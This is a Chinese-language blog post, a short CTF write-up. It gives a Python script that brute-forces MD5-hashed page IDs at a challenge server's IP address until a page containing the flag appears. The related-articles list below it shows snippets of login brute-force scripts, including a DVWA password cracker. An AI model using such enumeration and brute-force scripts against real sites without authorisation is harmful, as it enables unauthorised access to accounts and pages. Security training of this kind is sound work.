python脚本网址爆破

最新推荐文章于 2024-05-02 00:33:29 发布
最新推荐文章于 2024-05-02 00:33:29 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: ctf python 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/specter11235/article/details/74999423
版权

早上看到群里放的一道CTF题,题目链接已经关了,页面上有三条链接,对应3个人名,点开观察后发现URL中page的值是md5,解码后看出是人名加3位数字,于是要第三个人名slash+3位数字,转成md5进行爆破,找到含有flag的网页,表达不清楚,直接上脚本orz

import requests
import hashlib
def md5(str):    #md5加密
    m = hashlib.md5()  
    m.update(str)
    return m.hexdigest()

for i in range(1,999):
    i=str(i).encode('unicode-escape')  #将数字转为字符型,编码改为 bytes,md5只能对bytes编码操作
    url="http://121.42.34.88:23080/index.php?page="+md5(b"slash"+i)
    s=requests.get(url)
    s.encoding = 'utf-8'   #修改编码
    if('flag' in s.text):  #如果网页中有flag字段,则将页面返回
        print(s.text)
        break
    print (i)

由于原题目链接失效,运行也跑不出结果了。总之就是一个md5加密函数和网址爆破的思路吧。。。
(坚持写博客真是太难了,一不小心就咸鱼起来了。。。)

cf1ybird
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【burpsuite:爆破网址的后台】
m0_71635484的博客
01-24 2759
burpsuite工具爆破用户后台实例分析
使用burp进行网站爆破
qq_49015005的博客
05-20 7928
burp爆破的前提条件是该网站账号密码没有进行加密而是明文,且验证码可以重复使用,如下图数据包中直接显示账号与密码且验证码不需要重复提交(此处需要自己使用burp进行测试) 1.进入burp,监听浏览器 2.打开网站输入账号,密码,验证码点击登录抓取数据包,将数据包发送到intruder中 3.Intruder —> Positions 单击Clear , 选中账号—> Add 选中密码->Add,选择爆破模式:Cluster bomb(若有两处选择Cluster bomb,一处则选择
python多线程批量访问url脚本
10-26
python多线程批量访问url脚本;使用grequests多线程访问,结果写入excel和txt都有,详细注释
Python脚本,网站暴力破解攻击
weixin_44297276的博客
03-28 2000
rv:78.0) Gecko/20100101 Firefox/78.0" # 用户代理。wordlist = "D:\Meu jogos Meus documentos\ProgetoNovo\small.txt" # 字典文件路径。target = input("\nInsira URL:") # 目标URL。# 当单词队列不为空时,获取队列中的单词。# 如果有恢复点,则从恢复点开始。# 遍历字典文件中的每个单词。# 定义函数:读取字典文件。
推荐|45个值得收藏的Python优质资源(附链接)(1)
最新发布
m0_61418075的博客
05-02 60
3. 最重要的Python算法–PygorithmPygorithm是一个纯Python风格编写的模块,通过导入所需的算法,获得相应的代码、时间复杂性等。这是一个开始学习Python编程的好方法,能够帮助初学者学习并实现Python中所有算法。4. 一个有趣又鲜为人知的Python代码片段集合—wtfPython5. 一个关于如何从Python脚本到打包项目的标准化指南6. Python列表生成器的教程在这份教程中,你将能够学习到如何在Python中有效地使用列表生成器来创建列表,替换(嵌套) for循环以
python3登录爆破脚本
deng_menglihua的博客
09-17 2793
登录爆破脚本 以下地址是我自己的DVWA靶场的地址,欢迎大家交流学习。 1.post型登录框爆破脚本 import requests s='0123456789' url="http://10.16.102.162/DVWA/vulnerabilities/brute/?" m=0 n=1 username=input("请输入用户名") data2={'username':username,'password':00000,'Login':'Login'} headers={'cookie':'secur
python爆破脚本_多线程爆破脚本(python3)
weixin_39598941的博客
12-15 1271
#!/usr/bin/env python3# -*- coding: utf-8 -*-import loggingimport argparseimport queueimport requestsimport threadingimport osimport timeimport randomfrom html.parser import HTMLParserfrom requests.pa...
abaqus python脚本入门
Yangjing6545的博客
05-08 1205
在abaqus左下角的script window中输入 session.journalOptions.setValues(replayGeometry=COORDINATE,recoverGeometry=COORDINATE) 这样abaqus的输出文件在保存点的坐标时候用数值形式保存,方便后面再利用。 找到工作目录下的".jnl"或".rpy"后缀的文件用文本编辑器打开...
python之——使用python编写爆破脚本
12-21
dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url=...
python脚本爆破shell
06-14
python脚本爆破shell
python制作企业邮箱的爆破脚本
12-23
总结来说,这个Python脚本通过`poplib`模块实现了对企业邮箱的POP3认证爆破,使用了多线程并结合文件输入来提高爆破速度。在实际环境中,此类脚本可能用于安全审计,以评估系统的账户安全性。但请务必谨慎使用,遵循...
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破
Python版Mssql爆破脚本
09-09
本文给大家分享的是使用Python实现的暴力破解mssql用户密码的脚本的代码,配合上合适的字典非常好用,有需要的小伙伴可以参考下
md5碰撞爆破python3脚本
01-16
md5碰撞爆破python3脚本
绕过token进行密码爆破(包含python攻击脚本
weixin_43960066的博客
07-30 1268
设置完毕以后开始爆破,时间取决于你的字典,如果是1个线程还没有办法爆破成功,可能是你的字典里面没有这个密码,在爆破页面我们将返回长度按照从大到小排列,就可以看到爆破成功的密码和其他的米密码长度不同。Token其实说的更通俗点可以叫暗号,在一些数据传输之前,要先进行暗号的核对,不同的暗号被授权不同的数据操作。6.服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据。选择需要抓取的Token的内容,同时设置和响应中相同的参数名字,点击OK。
渗透测试——python脚本(selenium模块)暴力破解
weixin_54346898的博客
08-07 1133
渗透测试——python脚本(selenium模块)暴力破解
网站后台爆破工具:WebCrack
热门推荐
zxのdream
10-30 3万+
webcrack 网站后台爆破工具
漏洞挖掘之爆破的艺术
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 550
oxo1 暴力破解偶遇302跳转 在进行暴力破解登录框的时候、发现第一个验证码是正常的、后面全部验证码错误、查看302的返回包 尝试直接用上方这个链接爆破、发现此链接可以直接绕过验证码来进行暴力破解。(成功的图当时没保存) 然后顺带讲一下,有时候爆破会遇到多个302跳转BurpSuite有一个设置可以跟随跳转 oxo2 暴力破解用户名的方法 爆破用户名的位置:登录、注册、忘记密码。如果能注册、在成功登录后修改密码处也有可能可以爆破用户名。 随手输入一波账号和密码、提示用户名或密码
python脚本爆破dvwa
09-23
Python脚本可以用于爆破DVWA(Damn Vulnerable Web Application)的安全漏洞,例如密码爆破和SQL注入。对于密码爆破,可以使用Python脚本来尝试不同的密码组合,直到找到正确的密码。对于SQL注入,Python脚本可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值